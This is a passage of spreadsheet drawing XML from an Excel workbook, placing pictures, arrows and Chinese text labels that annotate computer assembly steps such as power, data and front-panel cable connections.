        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/drawings/drawing101.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twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>6644640</xdr:colOff>
      <xdr:row>5</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>8267700</xdr:colOff>
      <xdr:row>10</xdr:row>
      <xdr:rowOff>137160</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="28673" name="Picture 1" descr="http://imgsrc.baidu.com/baike/abpic/item/d872d6954d499758d1135e3a.jpg"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId3" cstate="print"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="6934200" y="929640"/>
          <a:ext cx="1623060" cy="1089660"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/drawings/drawing102.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twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>6606540</xdr:colOff>
      <xdr:row>4</xdr:row>
      <xdr:rowOff>137160</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>8382000</xdr:colOff>
      <xdr:row>14</xdr:row>
      <xdr:rowOff>167640</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="31745" name="Picture 1" descr="http://imgsrc.baidu.com/baike/abpic/item/fd428c45b7c78c01879473aa.jpg"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId3" cstate="print"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="6896100" y="1150620"/>
          <a:ext cx="1775460" cy="1905000"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/drawings/drawing103.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twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>6659880</xdr:colOff>
      <xdr:row>1</xdr:row>
      <xdr:rowOff>137160</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>2</xdr:col>
      <xdr:colOff>76200</xdr:colOff>
      <xdr:row>8</xdr:row>
      <xdr:rowOff>175260</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="26625" name="Picture 1" descr="http://imgsrc.baidu.com/baike/abpic/item/f7426d8d92aa8e52b21bba3b.jpg"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId3" cstate="print"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="6949440" y="335280"/>
          <a:ext cx="1905000" cy="1318260"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/drawings/drawing104.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twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>6416040</xdr:colOff>
      <xdr:row>5</xdr:row>
      <xdr:rowOff>22860</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>8313420</xdr:colOff>
      <xdr:row>12</xdr:row>
      <xdr:rowOff>53340</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="27649" name="Picture 1" descr="http://imgsrc.baidu.com/baike/abpic/item/0e655ca76903ec86d14358e0.jpg"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId3" cstate="print"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="6705600" y="1234440"/>
          <a:ext cx="1897380" cy="1356360"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/drawings/drawing105.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twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>4518660</xdr:colOff>
      <xdr:row>50</xdr:row>
      <xdr:rowOff>38100</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>4709160</xdr:colOff>
      <xdr:row>50</xdr:row>
      <xdr:rowOff>175260</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="3" name="TextBox 2"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="4808220" y="13594080"/>
          <a:ext cx="190500" cy="1371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latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>2</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" baseline="30000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>32</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="+mn-cs"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100"/>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>7261860</xdr:colOff>
      <xdr:row>50</xdr:row>
      <xdr:rowOff>22860</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>7452360</xdr:colOff>
      <xdr:row>50</xdr:row>
      <xdr:rowOff>160020</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="4" name="TextBox 3"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="7551420" y="13578840"/>
          <a:ext cx="190500" cy="1371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latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>2</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" baseline="30000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>30</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="+mn-cs"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100"/>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/drawings/drawing106.xml><?xml version="1.0" encoding="utf-8"?>
<xdr:wsDr xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>8001000</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>30480</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>8130540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90560" y="30480"/>
          <a:ext cx="129540" cy="129540"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/drawings/drawing107.xml><?xml version="1.0" encoding="utf-8"?>
<xdr:wsDr xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>7</xdr:col>
      <xdr:colOff>76200</xdr:colOff>
      <xdr:row>1</xdr:row>
      <xdr:rowOff>76200</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>8</xdr:col>
      <xdr:colOff>388620</xdr:colOff>
      <xdr:row>8</xdr:row>
      <xdr:rowOff>182880</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="44" name="矩形 43"/>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="5318760" y="259080"/>
          <a:ext cx="1988820" cy="1440180"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent1">
            <a:lumMod val="20000"/>
            <a:lumOff val="80000"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:schemeClr val="tx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7</xdr:col>
      <xdr:colOff>1310640</xdr:colOff>
      <xdr:row>19</xdr:row>
      <xdr:rowOff>137160</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>7</xdr:col>
      <xdr:colOff>1668780</xdr:colOff>
      <xdr:row>22</xdr:row>
      <xdr:rowOff>60960</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="2" name="TextBox 1"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="6560820" y="3749040"/>
          <a:ext cx="358140"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wordArtVertRtl" wrap="square" rtlCol="0" anchor="t"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>电源</a:t>
          </a:r>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>5</xdr:col>
      <xdr:colOff>137160</xdr:colOff>
      <xdr:row>42</xdr:row>
      <xdr:rowOff>137160</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>7</xdr:col>
      <xdr:colOff>350520</xdr:colOff>
      <xdr:row>47</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="3" name="TextBox 2"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="4168140" y="8130540"/>
          <a:ext cx="1432560" cy="1783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t>机箱面板</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100"/>
        </a:p>
        <a:p>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>硬盘工作指示灯线</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>电源工作指示灯线</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>重启按钮线</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>电源开关按钮线</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>主机箱嗽线</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
            <a:t>USB</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>连线（前置）</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>音频连线（前置）</a:t>
          </a:r>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>7</xdr:col>
      <xdr:colOff>277440</xdr:colOff>
      <xdr:row>2</xdr:row>
      <xdr:rowOff>30480</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>7</xdr:col>
      <xdr:colOff>997440</xdr:colOff>
      <xdr:row>2</xdr:row>
      <xdr:rowOff>32068</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="5" name="直接箭头连接符 4"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="5520000" y="403860"/>
          <a:ext cx="720000" cy="1588"/>
        </a:xfrm>
        <a:prstGeom prst="straightConnector1">
          <a:avLst/>
        </a:prstGeom>
        <a:ln w="19050">
          <a:solidFill>
            <a:srgbClr val="FF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277440</xdr:colOff>
      <xdr:row>3</xdr:row>
      <xdr:rowOff>137160</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>7</xdr:col>
      <xdr:colOff>997440</xdr:colOff>
      <xdr:row>3</xdr:row>
      <xdr:rowOff>138748</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="6" name="直接箭头连接符 5"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="5520000" y="701040"/>
          <a:ext cx="720000" cy="1588"/>
        </a:xfrm>
        <a:prstGeom prst="straightConnector1">
          <a:avLst/>
        </a:prstGeom>
        <a:ln w="19050">
          <a:solidFill>
            <a:srgbClr val="00B05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277440</xdr:colOff>
      <xdr:row>5</xdr:row>
      <xdr:rowOff>106680</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>7</xdr:col>
      <xdr:colOff>997440</xdr:colOff>
      <xdr:row>5</xdr:row>
      <xdr:rowOff>108268</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="7" name="直接箭头连接符 6"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="5520000" y="1051560"/>
          <a:ext cx="720000" cy="1588"/>
        </a:xfrm>
        <a:prstGeom prst="straightConnector1">
          <a:avLst/>
        </a:prstGeom>
        <a:ln w="19050">
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>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1104900</xdr:colOff>
      <xdr:row>5</xdr:row>
      <xdr:rowOff>30480</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>8</xdr:col>
      <xdr:colOff>327660</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>38100</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="8" name="TextBox 7"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="6347460" y="975360"/>
          <a:ext cx="899160" cy="1981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rtlCol="0" anchor="t"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>机内电源连线</a:t>
          </a:r>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>7</xdr:col>
      <xdr:colOff>1104900</xdr:colOff>
      <xdr:row>3</xdr:row>
      <xdr:rowOff>60960</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>8</xdr:col>
      <xdr:colOff>99060</xdr:colOff>
      <xdr:row>4</xdr:row>
      <xdr:rowOff>68580</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="9" name="TextBox 8"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="6347460" y="624840"/>
          <a:ext cx="670560" cy="1981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rtlCol="0" anchor="t"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>数据连线</a:t>
          </a:r>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>7</xdr:col>
      <xdr:colOff>1104900</xdr:colOff>
      <xdr:row>1</xdr:row>
      <xdr:rowOff>152400</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>8</xdr:col>
      <xdr:colOff>327660</xdr:colOff>
      <xdr:row>2</xdr:row>
      <xdr:rowOff>160020</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="10" name="TextBox 9"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="6347460" y="335280"/>
          <a:ext cx="899160" cy="1981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rtlCol="0" anchor="t"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>市电连线</a:t>
          </a:r>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>7</xdr:col>
      <xdr:colOff>784080</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>53340</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>7</xdr:col>
      <xdr:colOff>997440</xdr:colOff>
      <xdr:row>8</xdr:row>
      <xdr:rowOff>30480</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="11" name="下箭头 10"/>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="6026640" y="1379220"/>
          <a:ext cx="213360" cy="1676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7</xdr:col>
      <xdr:colOff>1104900</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>7620</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>8</xdr:col>
      <xdr:colOff>327660</xdr:colOff>
      <xdr:row>8</xdr:row>
      <xdr:rowOff>15240</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="12" name="TextBox 11"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="6347460" y="1333500"/>
          <a:ext cx="899160" cy="1981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rtlCol="0" anchor="t"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>插入即可</a:t>
          </a:r>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>2</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>2</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>2</xdr:col>
      <xdr:colOff>213360</xdr:colOff>
      <xdr:row>2</xdr:row>
      <xdr:rowOff>167640</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="13" name="下箭头 12"/>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="1973580" y="373380"/>
          <a:ext cx="213360" cy="1676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2</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>4</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>2</xdr:col>
      <xdr:colOff>213360</xdr:colOff>
      <xdr:row>4</xdr:row>
      <xdr:rowOff>167640</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="14" name="下箭头 13"/>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="1973580" y="754380"/>
          <a:ext cx="213360" cy="1676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2</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>2</xdr:col>
      <xdr:colOff>213360</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>167640</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="15" name="下箭头 14"/>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="1973580" y="1135380"/>
          <a:ext cx="213360" cy="1676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2</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>8</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>2</xdr:col>
      <xdr:colOff>213360</xdr:colOff>
      <xdr:row>8</xdr:row>
      <xdr:rowOff>167640</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="16" name="下箭头 15"/>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="1973580" y="1516380"/>
          <a:ext cx="213360" cy="1676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2</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>10</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>2</xdr:col>
      <xdr:colOff>213360</xdr:colOff>
      <xdr:row>10</xdr:row>
      <xdr:rowOff>167640</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="17" name="下箭头 16"/>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="1973580" y="1897380"/>
          <a:ext cx="213360" cy="1676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2</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>12</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>2</xdr:col>
      <xdr:colOff>213360</xdr:colOff>
      <xdr:row>12</xdr:row>
      <xdr:rowOff>167640</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="18" name="下箭头 17"/>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="1973580" y="2278380"/>
          <a:ext cx="213360" cy="1676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2</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>14</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>2</xdr:col>
      <xdr:colOff>213360</xdr:colOff>
      <xdr:row>14</xdr:row>
      <xdr:rowOff>167640</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="19" name="下箭头 18"/>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="1973580" y="2659380"/>
          <a:ext cx="213360" cy="1676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4</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>10</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>576000</xdr:colOff>
      <xdr:row>10</xdr:row>
      <xdr:rowOff>1588</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="21" name="直接箭头连接符 20"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="3413760" y="1897380"/>
          <a:ext cx="576000" cy="1588"/>
        </a:xfrm>
        <a:prstGeom prst="straightConnector1">
          <a:avLst/>
        </a:prstGeom>
        <a:ln w="19050">
          <a:solidFill>
            <a:srgbClr val="00B05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12</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>576000</xdr:colOff>
      <xdr:row>12</xdr:row>
      <xdr:rowOff>1588</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="22" name="直接箭头连接符 21"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="3413760" y="2278380"/>
          <a:ext cx="576000" cy="1588"/>
        </a:xfrm>
        <a:prstGeom prst="straightConnector1">
          <a:avLst/>
        </a:prstGeom>
        <a:ln w="19050">
          <a:solidFill>
            <a:srgbClr val="00B05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14</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>576000</xdr:colOff>
      <xdr:row>14</xdr:row>
      <xdr:rowOff>1588</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="23" name="直接箭头连接符 22"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="3413760" y="2659380"/>
          <a:ext cx="576000" cy="1588"/>
        </a:xfrm>
        <a:prstGeom prst="straightConnector1">
          <a:avLst/>
        </a:prstGeom>
        <a:ln w="19050">
          <a:solidFill>
            <a:srgbClr val="00B05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xdr:colOff>
      <xdr:row>20</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
